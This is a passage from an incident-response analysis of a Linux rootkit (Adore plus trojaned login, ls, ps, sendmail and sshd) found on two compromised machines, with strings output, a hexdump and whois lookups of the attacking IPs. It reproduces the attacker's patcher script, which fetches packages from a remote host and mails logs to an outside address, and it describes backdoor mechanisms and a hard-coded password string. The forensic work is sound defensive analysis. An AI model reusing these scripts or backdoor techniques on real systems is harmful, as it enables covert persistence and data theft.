      RhostsRSAAuthentication yes
      RSAAuthentication yes
      PasswordAuthentication yes
      PermitEmptyPasswords yes
      UseLogin no
       

         


    The other files in the rootkit directory do the following:

    uconf.inv - I believe this file is where Adore keeps the list of items to  be hidden. The file is referenced by ls, ps, netstat. The strings command produces no data however the file is DATA (but not ascii) and it contains 652 character (wc -c). Below is the hexdump.  There was only one line difference beween the hexdump from Victim#1 and Victim#2's file
    The line line on Victim#2 that is different 

    Victim 2 - 0000280 8c8c 91c2 8991 c795 9395 f591 
    ---
    Victim 1 - 0000280 8c8c 8dc2 99c9 cdcf 878b f591 

    <Start of uconf.inv hexdump from Victim#1>
    0000000 99a4 9396 a29a 99f5 9196 c29b 93d0 9d96
    0000010 8cd0 9c9a 8d8a 8b96 d086 9cd1 9190 9699
    0000020 d098 969d d091 9699 9b91 9bf5 c28a 93d0
    0000030 9d96 8cd0 9c9a 8d8a 8b96 d086 9cd1 9190
    0000040 9699 d098 969d d091 8a9b 93f5 c28c 93d0
    0000050 9d96 8cd0 9c9a 8d8a 8b96 d086 9cd1 9190
    0000060 9699 d098 969d d091 8c93 99f5 9396 a09a
    0000070 9699 8b93 8d9a c28c 9c8a 9190 d199 9196
    0000080 d389 9c8b d18f 9093 d398 9387 9890 9196
    0000090 d1d3 909c 9991 9896 d1d3 909c 9991 9896
    00000a0 8cd3 978c 9bcd f5f5 8fa4 a28c 8ff5 c28c
    00000b0 93d0 9d96 8cd0 9c9a 8d8a 8b96 d086 9cd1
    00000c0 9190 9699 d098 969d d091 8c8f f58d 8c8f
    00000d0 99a0 9396 9a8b 8c8d 93c2 8e8f 93d3 8c8f
    00000e0 979c 9b9a 8cd3 ce97 d38b 8c8f d38d 8c8c
    00000f0 cd97 d39b 8f93 9a8c d38b 8f93 9c8c 9a97
    0000100 d39b 9387 9890 9196 d0d3 9693 d09d 9a8c
    0000110 f59c 8c93 9990 99a0 9396 9a8b 8c8d d0c2
    0000120 9693 d09d 9a8c 8a9c 968d 868b d1d0 909c
    0000130 9991 9896 8ad3 909c 9991 96d1 8991 8fd3
    0000140 918c 9996 d399 8c8f d38d cec5 cfcc cfcf
    0000150 c5d3 cacd cfcf d3cf 9bd0 899a 8fd0 8c8b
    0000160 cfd0 d3ce 918c 93d1 8fd3 908d d392 8c93
    0000170 9990 8bd3 8f9c 93d1 9890 8cd3 978c 9bcd
    0000180 93d3 8c8f 979c 9b9a 87d3 9093 9698 d391
    0000190 9cd1 9190 9699 f598 a4f5 9a91 8c8b 9e8b
    00001a0 a28b 91f5 8b9a 8b8c 8b9e d0c2 9693 d09d
    00001b0 9a8c 8a9c 968d 868b d1d0 909c 9991 9896
    00001c0 9dd0 9196 91d0 8b9a 8b8c 8b9e 91f5 8b9a
    00001d0 99a0 9396 9a8b 8c8d cec2 cfcc cfcf cdd3
    00001e0 cfca cfcf c9d3 c9c9 d3c8 cfc7 cfcf c6d3
    00001f0 cfcf f5cf a4f5 9093 9698 a291 8cf5 a08a
    0000200 9093 c29c 93d0 9d96 8cd0 9c9a 8d8a 8b96
    0000210 d086 9cd1 9190 9699 d098 969d d091 8a8c
    0000220 8ff5 9196 c298 93d0 9d96 8cd0 9c9a 8d8a
    0000230 8b96 d086 9cd1 9190 9699 d098 969d d091
    0000240 968f 9891 8ff5 8c9e 888c c29b 93d0 9d96
    0000250 8cd0 9c9a 8d8a 8b96 d086 9cd1 9190 9699
    0000260 d098 969d d091 9e8f 8c8c 9b88 8cf5 9a97
    0000270 9393 d0c2 969d d091 978c 8cf5 a08a 9e8f
    0000280 8c8c 8dc2 99c9 cdcf 878b f591 
    000028c

    ava -  This is actually Adore. The object module which is used by this program is normally named adore.o, however it has been renamed /usr/lib/crth.o

    Here is the description that is posted on Packetstorm:
    Adore is a linux LKM based rootkit. Features smart PROMISC flag hiding, persistant file and directory hiding (still hidden after
    reboot), process-hiding, netstat hiding, rootshell-backdoor, and an uninstall routine. Includes a userspace program to control
    everything. Changes: Improved promisc hiding, port hiding fixed, and a readme

    cleaner - A shell script to clean up logfiles.

    #!/bin/sh
    #
    #       Generic log cleaner v0.4 By: Tragedy/Dor (dor@kaapeli.net)
    #               Based on sauber..
    #
    #  This is TOTALLY incomplete... I never added support for IRIX or SunOS...
    #  And.. i most likely never will.. And i take no responsibility for any use/misuse
    #  of this tool..
    #
    # Notes-0.3
    #   SunOS support added.. had to rewrite most of it :P
    # Notes-0.4
    #   Beta IRIX support added and enabled...
     

    sz - A file resize application, also by Dor

    #!/bin/sh
    # File resizer v2.4 (C) 1999-2000 Tragedy/Dor (dor@fortknox.org)
    # Purpose: Adds zeroes to a file to match it`s size to another file.
    # Disclaimer: The author takes no responsibility for any use, misuse
    # or bugs in this program.

    patcherA patching engine for Redhat Rootkit

    < patcher begin>
    #!/bin/sh
    # Patching engine for RedHat Rootkit

    REDHAT=`cat /etc/redhat-release | awk '{print $5}'`
    DUMPSITE="adm@38.246.1.9:/var/adm/"

    upd()
    {
    printf "Installing $1"
    rcp ${DUMPSITE}${1} ./
    ls -lga $1 >>patcher.log
    rpm -Uvh $1 >>patcher.log
    }
            case $REDHAT in
                    6.0)
                    upd am-utils-6.0.1s11-1.6.0.i386.rpm
                    upd bind-8.2.2_P3-1.i386.rpm
                    upd vixie-cron-3.0.1-38.i386.rpm
                    upd nfs-utils-0.1.9.1-1.i386.rpm
                            ;;
                    6.1)
                    upd bind-8.2.2_P3-1.i386.rpm
                    upd gdm-2.0beta2-26.i386.rpm
                    upd nfs-utils-0.1.9.1-1.i386.rpm
                            ;;
                    6.2)
                    upd gdm-2.0beta2-26.i386.rpm
                    upd nfs-utils-0.1.9.1-1.i386.rpm
                            ;;
                    7.0)
                            ;;
                    *)
                           # prolly something lame like 6.2kr
                            exit
                            ;;
                    esac

    cat patcher.log | mail -s `hostname -f` tcl_co@mailroom.com
    < End of patcher>

    pg - A binary file.  I believe it is used to encrypt a password (which was found in /etc/ld.so.hash)
     

    <Strings output of pg>
    /lib/ld-linux.so.2
    __gmon_start__
    libcrypt.so.1
    crypt
    libc.so.6
    printf
    __deregister_frame_info
    _IO_stdin_used
    __libc_start_main
    __register_frame_info
    GLIBC_2.0
    PTRh
    QVhP
    Usage %s <password>
    <End of pg>


    crypt - A binary file.  I believe this command is used to encrypt the transmission of the captured sniffer data.
     

    <Strings output of crypt>
    /lib/ld-linux.so.2
    __gmon_start__
    libc.so.6
    printf
    fprintf
    __deregister_frame_info
    _IO_getc
    fclose
    stderr
    fputc
    fopen
    _IO_stdin_used
    __libc_start_main
    __register_frame_info
    GLIBC_2.1
    GLIBC_2.0
    PTRh
    QVh 
    Cannot open input file: "%s".
    File processed...
    <End of  crypt>


    utime - Binary file that prints the current time seconds from Epoch. 
    lpsched - Binary file.  This is the sniffer application.
     

    <Strings from lpsched>
    /lib/ld-linux.so.2
    __gmon_start__
    libc.so.6
    strcpy
    ioctl
    perror
    dup2
    malloc
    gethostbyaddr
    socket
    fflush
    alarm
    fprintf
    ctime
    __deregister_frame_info
    signal
    read
    strncpy
    fork
    inet_ntoa
    time
    isprint
    sprintf
    fclose
    stderr
    exit
    fopen
    _IO_stdin_used
    __libc_start_main
    open
    toupper
    setsid
    __register_frame_info
    close
    free
    GLIBC_2.1
    GLIBC_2.0
    PTRh
    urf;{
    hWVS
    8-uLF
    ============================================================
    Time: %s     Size: %d
    Path: %s
     => %s [%d]
    ------------------------------------------------------------
    Exiting...
    cant get SOCK_PACKET socket
    cant get flags
    cant set promiscuous mode
    eth0
    /dev/null
    cant open log
    <End of lpsched>


    mfs - This is the sniffer capture file.



    Files located outside of the Rootkit home directory:


    /bin/login - The original login command is renamed xlogin. When a user logs in, the trojaned login executes first.  This command reads the file /etc/ld.so.hash, which contains an encrypted password. Then prompts the user for their username and password. My theory is that once the username and password have been obtained, an attempt toauthenticate the user by checking the ld.so.hash password is executed. If this fails the original login command (now xlogin) is executed. If the password matches the password in ld.so.hash,  /bin/sh is executed.
     

    <Strings output of login>
    /lib/ld-linux.so.2
    __gmon_start__
    libcrypt.so.1
    crypt
    libc.so.6
    strcpy
    printf
    getenv
    execve
    fgets
    getpass
    system
    __deregister_frame_info
    stdin
    sscanf
    strcmp
    exit
    fopen
    _IO_stdin_used
    __libc_start_main
    __register_frame_info
    GLIBC_2.0
    GLIBC_2.1
    PTRh\
    WVSh
    DISPLAY
    /etc/ld.so.hash
    /bin/xlogin
    login: 
    Password:
    /bin/sh
    <End of login>


    /bin/ls - The original ls command was moved to /lib/security/.config/bin/ls. The bad ls command executes first, then calls the original command.
     

    <Strings output of ls>
    /lib/ld-linux.so.2
    __gmon_start__
    libc.so.6
    strcpy
    waitpid
    printf
    stdout
    fdopen
    fgets
    pclose
    dup2
    feof
    remove
    fflush
    popen
    pipe
    strcat
    __deregister_frame_info
    chdir
    fseek
    strstr
    rand
    strncmp
    _IO_getc
    fork
    execv
    ftell
    srand
    time
    opendir
    tmpnam
    getcwd
    fclose
    fputc
    rewind
    exit
    fopen
    _IO_putc
    _IO_stdin_used
    _exit
    __libc_start_main
    open
    strchr
    execvp
    closedir
    __register_frame_info
    close
    GLIBC_2.1
    GLIBC_2.0
    PTRh
    PPVh
    WVS1
    t5h@
    WVSh
    8-tL
    WVSh=
    VjPh
    VjPh
    /lib/security/.config/uconf.inv
    [file]
    find
    file_filters
    [ps]
    ps_filters
    [netstat]
    netstat
    net_filters
    lsof_filters
    lsof
    [login]
    su_pass
    su_loc
    ping
    passwd
    shell
    [%d] = %p "%s"
    --format=long
    --format=verbose
    --all
    --almost-all
    --ignore-backups
    --time=
    --sort=
    /lib/security/.config/bin/ls
    01,lblibps.so,sn.l,prom
    <End of ls>
    /bin/netstat

    /bin/ping

    <Strings output of ping>
    /lib/ld-linux.so.2
    __gmon_start__
    libc.so.6
    strcpy
    fdopen
    fgets
    dup2
    system
    feof
    remove
    pipe
    __deregister_frame_info
    fseek
    strstr
    rand
    strncmp
    _IO_getc
    fork
    execv
    ftell
    srand
    time
    tmpnam
    fclose
    fputc
    rewind
    fopen
    _IO_stdin_used
    _exit
    __libc_start_main
    open
    strchr
    execvp
    setuid
    __register_frame_info
    close
    GLIBC_2.1
    GLIBC_2.0
    PTRh
    WVSh
    VjPh
    VjPh
    /lib/security/.config/uconf.inv
    [file]
    find
    file_filters
    [ps]
    ps_filters
    [netstat]
    netstat
    net_filters
    lsof_filters
    lsof
    [login]
    su_pass
    su_loc
    ping
    passwd
    shell
    /lib/security/.config/bin/ping
    dbhaHKk53
    /bin/sh
    <End of ping>
    /bin/ps-- he original ls command was moved to /lib/security/.config/bin/ls. The bad ps command executes first, then calls the original command.
    <strings output of ps>
    /lib/ld-linux.so.2
    __gmon_start__
    libc.so.6
    strcpy
    printf
    fdopen
    getpid
    fgets
    dup2
    system
    feof
    malloc
    remove
    pipe
    kill
    __deregister_frame_info
    fseek
    wait
    strstr
    rand
    strncmp
    _IO_getc
    fork
    ftell
    srand
    time
    tmpnam
    fclose
    fputc
    rewind
    __errno_location
    fopen
    _IO_stdin_used
    _exit
    __libc_start_main
    open
    strchr
    execvp
    setuid
    __register_frame_info
    close
    GLIBC_2.1
    GLIBC_2.0
    PTRh
    QVh@
    WVSh
    VjPh
    VjPh
    /lib/security/.config/uconf.inv
    [file]
    find
    file_filters
    [ps]
    ps_filters
    [netstat]
    netstat
    net_filters
    lsof_filters
    lsof
    [login]
    su_pass
    su_loc
    ping
    passwd
    shell
    /lib/security/.config/bin/psr
    lp,uconf.inv,psniff,psr
    dbhaHKk53
    /bin/sh
    <End of ps>
    /bin/su

    /bin/xlogin -  This is the original login command which is called from the trojaned one.

    /etc/init.d/network - The system startup file was modified to execute the sniffer during boot time.
     

    <clipped>
            /usr/bin/ssh2d -q
            /sbin/insmod -f /usr/lib/crth.o
            cd /lib/security/.config;./lpsched
            touch /var/lock/subsys/network
            if test -f "/dev/dos"; then
            /usr/lib/lpq
            fi
            ;;
    <clipped>


    /etc/ld.so.hash - This is an encrypted password.  It was different on each compromised machine.

    /sbin/login - It looks like this login was placed in the wrong directory.

    /sbin/lsof 

    /sbin/sendmail - a trojaned sendmail which installs the ssh backdoor.

    - Code embedded in sendmail binary:
    ----
    250 OK
    500 Command unrecognized: "tek"
    cp -f /lib/security/.config/sshd /usr/bin/ssh2d
    /usr/bin/ssh2d -q
    221 %s closing connection
    502 Verbose unavailable
    VERB
    250 Verbose mode
    ONEX
    /usr/bin/du - Modified to hide 
    <strings of du>
    j=h@
    /lib/security/.config/uconf.inv
    [file]
    find
    file_filters
    [ps]
    ps_filters
    [netstat]
    netstat
    net_filters
    lsof_filters
    lsof
    [login]
    su_pass
    su_loc
    ping
    passwd
    shell
    /lib/security/.config/bin/du
    01,lblibps.so,sn.l,prom
    <End of du>
    /usr/bin/find -

    /usr/sbin/ssh2d -
     

    <strings of ssh2d - clipped>
    +G$9
    /lib/security/.config/ssh/sshd_config
    Received SIGHUP; restarting.
    RESTART FAILED: av[0]='%s', error: %s.
    Received signal %d; terminating.
    Timeout before authentication.
    Generating new %d bit RSA key.
    RSA key generation complete.
    f:p:b:k:h:g:diqV:
    i586-unknown-linux
    1.2.25
    sshd version %s [%s]
    Usage: %s [options]
    Options:
    /lib/security/.config/ssh
      -f file    Configuration file (default %s/sshd_config)
      -d         Debugging mode
      -i         Started from inetd
      -q         Quiet (no logging)
      -p port    Listen on the specified port (default: 22)
      -k seconds Regenerate server key every this many seconds (default: 3600)
      -g seconds Grace period for authentication (default: 300)
      -b bits    Size of server RSA key (default: 768 bits)
    /lib/security/.config/ssh/ssh_host_key
      -h file    File from which to read host key (default: %s)
      -V str     Remote version string already read from the socket
    fatal: Bad server key size.
    fatal: Bad port number.
    fatal: Extra argument %s.
    sshd version %.100s [%.100s]
    Could not load host key: %.200s
    fatal: Please check that you have sufficient permissions and the file exists.
    fatal: Could not load host key: %.200s.  Check path and permissions.
    daemon: %.100s
    Forcing server key to %d bits to make it differ from host key.
    Initializing random number generator; seed file %.200s
    inetd sockets after dupping: %d, %d
    Generating %d bit RSA key.
    socket: %.100s
    bind: %.100s
    Bind to port %d failed: %.200s.
    Server listening on port %d.
    listen: %.100s
    select: %.100s
    accept: %.100s
    Server will not fork when running in debugging mode.
    fork: %.100s
    Forked child %d.
    Connection from %.100s port %d
    SSH-%d.%d-%.50s
    Could not write ident string.
    Did not receive ident string.
    SSH-%d.%d-%[^
    Protocol mismatch.
    Bad protocol version identification: %.100s
    Client protocol version %d.%d; client software version %.100s
    Protocol major versions differ.
    Protocol major versions differ: %d vs. %d
    Your ssh version is too old and is no longer supported.  Please install a newer version.
    This server does not support your new ssh version.
    Unexpected return value from check_emulation.
    Connection from %.200s not allowed.
    Sorry, you are not allowed to connect.
    Closing connection to %.100s
    Sent %d bit public key and %d bit host key.
    IP Spoofing check bytes do not match.
    Encryption type: %.200s
    do_connection
    sshd.c
    sensitive_data.private_key.bits >= sensitive_data.host_key.bits + 128
    sensitive_data.host_key.bits >= sensitive_data.private_key.bits + 128
    Received session key; encryption turned on.
     All port forwardings disabled in this site.
    Forking shell.
    Executing command '%.500s'
    Unknown packet type received after authentication: %d
    Executing forced command: %.900s
    Could not create pipes: %.100s
    setsid: %.100s
    dup2 stdin
    dup2 stdout
    dup2 stderr
    fork failed: %.100s
    pty_cleanup_proc called again, ignored
    pty_cleanup_proc called
    dup2 stdin failed: %.100s
    getpeername: %.100s
    %.200s/.hushlogin
    Last login: %s
    Last login: %s from %s
    /etc/motd
    dup failed: %.100s
    %s=%s
    Bad line in %.100s: %.200s
    /etc/nologin
    Logins are currently denied by /etc/nologin:
     executing remote command as user %.200s
    setgid
    initgroups
    setuid %d: %s
    Failed to set uids to %d.
    /bin/sh
    HOME
    USER
    LOGNAME
    /usr/bin:/bin:/lib/security/.config/bin
    PATH
    /var/spool/mail
    %.200s/%.50s
    MAIL
    SHELL
    SSH_ORIGINAL_COMMAND
    %.50s %d %d
    SSH_CLIENT
    SSH_TTY
    TERM
    DISPLAY
    REMOTEUSER
    SSH_AUTH_SOCK
    /etc/environment
    %.200s/.ssh/environment
    Could not chdir to home directory %s: %s
    Environment:
      %.200s
    .ssh/rc
    %.100s %.100s
    Running %s
    %s %s
    Could not run %s
    /lib/security/.config/ssh/sshrc
    Running %.100s add %.100s %.100s %.100s
    %.200s -q -
    add %s %s %s
    add %.*s/unix%s %s %s
    Running %s add %s%s %s %s
    add %s%s %s %s
    Could not run %s -q -
    No mail.
    You have mail.
    You have new mail.
            WARNING: Your account expires in %d days
            WARNING: Your password expires in %d days
    Found control characters in the .rhosts or .shosts file, rest of the file ignored
    NO_PLUS
    Found empty line in %.100s.
    Found garbage in %.100s.
    %s %s %s
    Ignoring wild host/user names in %.100s.
    Use of %s denied for %s
    Matched negative entry in %.100s.
    .rhosts
    .shosts
    %.500s/%.100s
    /etc/hosts.equiv
    /lib/security/.config/ssh/shosts.equiv
    Connection from %.100s from nonprivileged port %d
    Your ssh client is not running as root.
    Accepted for %.100s [%.100s] by /etc/hosts.equiv.
    Accepted for %.100s [%.100s] by %.100s.
    Rhosts authentication refused for %.100: no home directory %.200s
    Rhosts authentication refused for %.100s: bad ownership or modes for home directory.
    Rhosts authentication refused for %.100s: bad modes for %.200s
    Bad file modes for %.200s
    Server has been configured to ignore %.100s.
    Accepted by %.100s.
    Rhosts/hosts.equiv authentication refused: client user '%.100s', server user '%.100s', client host '%.200s'.
    Server does not permit empty password login.
    /usr/bin/passwd
    %s %s
    Password if forced to be set at first login.
    Login permitted without a password because the account has no password.
    .ssh
    %.500s/%.100s
    Rsa authentication refused for %.100s: bad modes for %.200s
    Bad file modes for %.200s
    Rsa authentication refused for %.100s: no %.200s directory
    Rsa authentication refused, no %.200s directory
    .ssh/authorized_keys
    Could not open %.900s for reading.
    If your home is on an NFS volume, it may need to be world-readable.
    %.100s, line %lu: bad key syntax
    Wrong response to RSA authentication challenge.
    no-port-forwarding
    Port forwarding disabled.
    no-agent-forwarding
    Agent forwarding disabled.
    no-x11-forwarding
    X11 forwarding disabled.
    no-pty
    Pty allocation disabled.
    idle-timeout=
    Idle timeout set to %d seconds.
    command="
    %.100s, line %lu: missing end quote
    Forced command: %.900s
    environment="
    Adding to environment: %.900s
    from="
    RSA authentication tried for %.100s with correct key but not from a permitted host (host=%.200s, ip=%.200s).
    Your host '%.200s' is not permitted to use this key for login.
    Bad options in %.100s file, line %lu: %.50s
    Bugs in auth-rsa.c option processing.
    RSA authentication accepted.
    Trying rhosts with RSA host authentication for %.100s
    Rhosts RSA authentication: canonical host %.900s
    ~/.ssh/known_hosts
    /lib/security/.config/ssh/ssh_known_hosts
    Rhosts with RSA host authentication denied: unknown or invalid host key
    Your host key cannot be verified: unknown or invalid host key.
    The host name used to check the key was '%.200s'.
    Try logging back from the server machine with the canonical host name using ssh, and then try again.
    Client on %.800s failed to respond correctly to host authentication.
    Rhosts with RSA host authentication accepted for %.100s, %.100s on %.700s.
    Rhosts with RSA host authentication accepted.
    openpty: %.100s
    chown %.100s 0 0 failed: %.100s
    chmod %.100s 0666 failed: %.100s
    /dev/tty
    Failed to disconnect from controlling tty.
    Setting controlling tty using TIOCSCTTY.
    %.100s: %.100s
    open /dev/tty failed - could not set controlling tty: %.100s
    pty_make_controlling_tty: reopening controlling tty after vhangup failed for %.100s
    Unrecognized internal syslog facility code %d
    log: %s
    log: %.500s
    syslog_severity: bad severity %d
    debug: %s
    debug: %.500s
    error: %s
    error: %.500s
    fatal_remove_cleanup: no such cleanup function: 0x%lx 0x%lx
    Calling cleanup 0x%lx(0x%lx)
    fatal: %s
    fatal: %.500s
    /var/log/lastlog
    P%03d
    Could not write %.100s: %.100s
    Could not open %.900s for reading.
    If your home directory is on an NFS volume, it may need to be world-readable.
    %.500s %u 
    getpeername failed: %.100s
    UNKNOWN
    reverse mapping checking gethostbyname for %.700s failed - POSSIBLE BREAKIN ATTEMPT!
    Address %.100s maps to %.600s, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!
    Could not reverse map address %.100s.
     %2.2x
    Connection from %.100s with IP options:%.800s
    /lib/security/.config/ssh/ssh_host_key
    /lib/security/.config/ssh/ssh_random_seed
    /var/run/sshd.pid
    /usr/X11R6/bin/xauth
    accountexpirewarningdays
    passwordexpirewarningdays
    checkmail
    xauthlocation
    allowtcpforwarding
    kerberostgtpassing
    kerberosorlocalpasswd
    kerberosauthentication
    idletimeout
    silentdeny
    umask
    pidfile
    <clipped>
    Computing the keys...
    Testing the keys...
    **** private+public failed to decrypt.
    **** public+private failed to decrypt.
    Key generation complete.
    ps laxww 2>/dev/null
    ps -al 2>/dev/null
    ls -alni /tmp/. 2>/dev/null
    w 2>/dev/null
    netstat -s 2>/dev/null
    netstat -an 2>/dev/null
    netstat -in 2>/dev/null
    /dev/random
    random_get_byte
    randoms.c
    state->next_available_byte < (8192 / 8)
    buffer_get trying to get more bytes than in buffer
     %02x
    <clipped>
    <End of ssh2d>


    /usr/lib/crth.o - This is the object module which is created when adore is compiled.  It is normally named adore.o

    <strings of crth.o>
    B49J\u
    9H\t 
    x&!u
    t+;]
    8WVS
    netstat
    :15000
    klogd
    promiscuous mode
    <end of crth.o>
    /usr/lib/lpq - The application which creates the ICMP packet.
    <strings of lpq, clipped just a little bit>
    <clipped>
           T$,
    |$(W
    [^_]
    %d.%d.%d.%d
    Usage: %s <dst> <src> <size> <number>
    Ports are set to send and receive on port 179
    dst:    Destination Address
    src:    Source Address
    size:   Size of packet which should be no larger than 1024 should allow for xtra header info thru routes
    num:    packets
    Could not resolve %s fucknut
    ICMP
    jess
    tc: unknown host
    3.3.3.3
    mservers
    randomsucks
    skillz
    lpsched
    in.telne
    ./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
    !(Ew
    ~&jE
     iciNWq
    x`\`U
    <End of lpq>


    /var/lock/subsys/network -

    /dev/dos -

    .

     
    Information obtained via samspade.org
    Whois 205.177.91.2
    Registrant:
    Internet Express, Inc. (X-PRESS-DOM)
       po box 240
       Damascus, MD 20872-0240

       Domain Name: X-PRESS.NET

       Administrative Contact, Billing Contact:
          Aultz, Christine A.  (CAA8)  aultz@X-PRESS.NET
          Internet Express, Inc.
          26225 Ridge Road
          Damascus, MD 20872
          (301) 631-8204
       Technical Contact:
          Brodka, Blaine  (BB1922)  blaine@X-PRESS.NET
          Internet Express, Inc
          PO BOX 240
          Damascus, MD 20872-0240
          301-253-1500 (FAX) 301-482-0543

       Record last updated on 25-Jul-2000.
       Record expires on 12-Mar-2001.
       Record created on 11-Mar-1996.
       Database last updated on 14-Dec-2000 07:38:23 EST.

       Domain servers in listed order:

       NS.X-PRESS.NET               205.177.91.4
       NS2.X-PRESS.NET              204.177.91.3

    IP block lookup for 205.177.91.2
    whois -h whois.arin.net 205.177.91.2

    CAIS Internet (NETBLK-CAIS-CIDR-BLK1)
       6861 Elm Street, Third Floor
       McLean, VA 22101 USA

       Netname: CAIS-CIDR-BLK1
       Netblock: 205.177.0.0 - 205.177.255.0
       Maintainer: CAIS

       Coordinator:
          Network Operations Center  (CAIS-NOC-ARIN)  domreg@CAIS.NET
          (703) 448-4470
    Fax- - (703) 790-8805

       Domain System inverse mapping provided by:

       NS.CAIS.COM                   205.177.10.10
       NS2.CAIS.COM                  199.0.216.222

       Rwhois information on assignments from this block available from
       rwhois.cais.net 4321
     

       Record last updated on 17-Aug-1998.
       Database last updated on 14-Dec-2000 07:04:54 EDT.

    Whois Lookup for 210.94.114.48
    OUTPUT from ARIN:

    Asia Pacific Network Information Center (NETBLK-APNIC-CIDR-BLK)
            These addresses have been further assigned to Asia-Pacific users.
            Contact information can be found in the APNIC database,
            at WHOIS.APNIC.NET or http://www.apnic.net/
            Please do not send spam complaints to APNIC.

            Netname: APNIC-CIDR-BLK2
            Netblock: 210.0.0.0 - 211.255.255.255

            Coordinator:
               Administrator, System  (SA90-ARIN)  sysadm@APNIC.NET
               +61-7-3367-0490

            Domain System inverse mapping provided by:

            NS.APNIC.NET                 203.37.255.97
            SVC00.APNIC.NET              202.12.28.131
            NS.TELSTRA.NET               203.50.0.137
            NS.RIPE.NET                  193.0.0.193

            Regional Internet Registry for the Asia-Pacific Region.

            *** Use whois -h whois.apnic.net                      ***

            *** or see http://www.apnic.net/db/ for database assistance   ***
     

            Record last updated on 03-May-2000.
            Database last updated on 5-Feb-2001 06:24:46 EDT.



    OUTPUT from APNIC:

    IP Address         : 210.94.114.0-210.94.114.255
    Connect ISP Name   : THRUNET
    Connect Date       : 20000507
    Registration Date  : 20001101
    Network Name       : ALLNIGHT-NET21

    [ Organization Information ]
    Orgnization ID     : ORG50800
    Name               : ALLNIGHT-NET
    State              : KYONGGI
    Address            : 614-5 nam-dong yongin-si
    Zip Code           : 449-030

    [ Admin Contact Information]
    Name               : keumsun-park
    Org Name           : ALLNIGHT-NET
    State              : KYONGGI
    Address            : 614-5 nam-dong yongin-si
    Zip Code           : 449-030
    Phone              : 0345-407-1317
    Fax                : null
    E-Mail             : ip@ns.kornet21.net

    [ Technical Contact Information ]
    Name               : keumsun-park
    Org Name           : ALLNIGHT-NET
    Address            : 614-5 nam-dong yongin-si
    Zip Code           : 449-030
    Phone              : 0345-407-1317
    Fax                : null
    E-Mail             : ip@ns.kornet21.net

    IP Lookup for 38.246.1.9
    Performance Systems International (NET-PSINETA)
              510 Huntmar Park Drive
                     Herndon, VA  22070

              Netname: PSINETA
              Netblock: 38.0.0.0 - 38.255.255.255
              Maintainer: PSI

              Coordinator:
                 PSINet,Inc.  (PSI-NISC-ARIN)  hostinfo@psi.com
                 (518) 283-8860

              Domain System inverse mapping provided by:

              NS.PSI.NET                   38.8.48.2
              NS2.PSI.NET                  38.8.50.2
              NS5.PSI.NET                  38.8.5.2

              Record last updated on 11-Nov-1998.
              Database last updated on 5-Feb-2001 06:24:46 EDT.

    IP Lookup for 18.242.162.210
    Massachusetts Institute of Technology (NET-MIT-TEMP)
              1 Amherst Street
              Cambridge, MA 02139-1986

              Netname: MIT
              Netblock: 18.0.0.0 - 18.255.255.255

              Coordinator:
                 Schiller, Jeffrey I  (JIS-ARIN)  jis@MIT.EDU
                 +1 617 253-8400 (FAX) +1 617 258-8736

              Domain System inverse mapping provided by:

              STRAWB.MIT.EDU               18.72.0.151
              W20NS.MIT.EDU                18.70.0.160
              BITSY.MIT.EDU                18.72.0.3

              Record last updated on 26-Sep-1998.
              Database last updated on 5-Feb-2001 06:24:46 EDT.